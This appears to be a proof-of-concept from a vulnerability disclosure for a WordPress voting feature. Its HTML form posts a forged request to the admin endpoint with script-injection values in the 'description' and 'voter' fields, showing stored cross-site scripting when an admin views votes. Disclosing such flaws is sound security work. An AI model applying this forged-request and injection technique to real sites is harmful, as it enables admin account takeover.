Have a subscriber open an HTML file containing the following:

<form action="http://localhost:8888/wordpress/wp-admin/index.php" method="POST">
    <input type="text" name="bill" value="1">
    <input type="text" name="description" value='subscriber"><img src=x onerror=alert(19)>'>
    <input type="text" name="vote" value="Yea">
    <input type="text" name="voter" value='subscriber"><img src=x onerror=alert(20)>'>
    <input type="text" name="date" value="2022-12-10">
    <input type="text" name="result" value="pass">
    <input type="text" name="tally" value="3">
    <input type="text" name="record_vote" value="Save">

See the XSS when logged in as an admin and viewing recorded votes.